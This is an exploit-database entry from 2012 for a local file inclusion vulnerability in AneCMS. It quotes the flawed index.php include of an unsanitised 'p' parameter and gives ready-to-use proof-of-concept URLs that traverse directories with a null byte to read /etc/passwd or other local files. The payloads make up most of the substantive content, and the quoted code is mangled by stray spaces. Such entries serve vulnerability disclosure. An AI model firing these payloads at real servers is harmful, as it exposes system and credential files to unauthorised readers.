AneCMS v.2e2c583 LFI exploit
| EKU-ID: 1582 | CVE: | OSVDB-ID: |
| Author: I2sec-PJH | Published: 2012-03-05 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 1582 | CVE: | OSVDB-ID: |
| Author: I2sec-PJH | Published: 2012-03-05 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: AneCMS v.2e2c583 LFI exploit
# Date: 03.04.2012# Author: I2sec-PJH
# Software Link: https://github.com/AneGroup/AneCMS
# Version: v.2e2c583 -----------------------------------------------------
-Description vulnerabilities have been discovered in the index page.
-source of index.php
1. if (isset ($ _GET ['p']))2. include '. / pages /'. $ _GET ['p']. '. php';
-PoC
http://localhost/index.php?p=../../../../etc/passwd%00
http://localhost/index.php?p=../../../../[localfile]%00